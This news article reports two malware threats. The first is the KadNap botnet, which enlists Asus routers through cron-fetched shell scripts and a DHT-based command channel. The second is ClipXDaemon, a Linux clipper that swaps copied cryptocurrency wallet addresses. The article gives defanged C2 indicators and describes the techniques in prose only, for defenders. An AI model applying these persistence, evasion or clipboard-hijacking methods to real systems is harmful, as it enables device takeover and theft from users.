Cybersecurity researchers have discovered a new malware called KadNap that’s primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic.
The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of infections have been detected in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain.
“KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring,” the cybersecurity company said in a report shared with The Hacker News.
Compromised nodes in the network leverage the DHT protocol to locate and connect with a command-and-control (C2) server, thereby making it resilient to detection and disruption efforts.
Once devices are successfully compromised, they are marketed by a proxy service named Doppelgänger (“doppelganger[.]shop”), which is assessed to be a rebrand of Faceless, another proxy service associated with TheMoon malware. Doppelgänger, according to its website, claims to offer resident proxies in over 50 countries that provide “100% anonymity.” The service is said to have launched in May/June 2025.
Despite the focus on Asus routers, the operators of KadNap have been found to deploy the malware against an assorted set of edge networking devices.
Central to the attack is a shell script (“aic.sh”) that’s downloaded from the C2 server (“212.104.141[.]140”), which is responsible for initiating the process of conscripting the victim to the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to “.asusrouter,” and run it.
Once persistence is established, the script pulls a malicious ELF file, renames it to “kad,” and executes it. This, in turn, leads to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors.
KadNap is also designed to connect to a Network Time Protocol (NTP) server to fetch the current time and store it along with the host uptime. This information serves as a basis to create a hash that’s used to locate other peers in the decentralized network to receive commands or download additional files.
The files – fwr.sh and /tmp/.sose – contains functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to.
“In short, the innovative use of the DHT protocol allows the malware to establish robust communication channels that are difficult to disrupt, by hiding in the noise of legitimate peer-to-peer traffic,” Lumen said.
Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is being categorized based on device type and models.
The Black Lotus Labs team told The Hacker News that Doppelgänger’s bots are being abused by threat actors in the wild. “One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity,” the company said.
Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and are no longer supported.
“The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control,” Lumen concluded. “Their intention is clear, avoid detection and make it difficult for defenders to protect against.”
New Linux Threat ClipXDaemon Emerges
The disclosure comes as Cyble detailed a new Linux threat dubbed ClipXDaemon that’s designed to target cryptocurrency users by intercepting and altering copied wallet addresses. The clipper malware, delivered via Linux post-exploitation framework called ShadowHS, has been described as an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments.
Staged entirely in memory, the malware employs stealth techniques, such as process masquerading and Wayland session avoidance, while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets. It’s capable of targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets.
The decision to avoid execution in Wayland sessions is deliberate, as the display server protocol’s security architecture places additional controls, like requiring explicit user interaction, before applications can access the clipboard content. In disabling itself under such scenarios, the malware aims to eliminate noise and avoid runtime failure.
“ClipXDaemon differs fundamentally from traditional Linux malware. It contains no command-and-control (C2) logic, performs no beaconing, and requires no remote tasking,” the company said. “Instead, it monetizes victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them in real time with attacker-controlled addresses.”
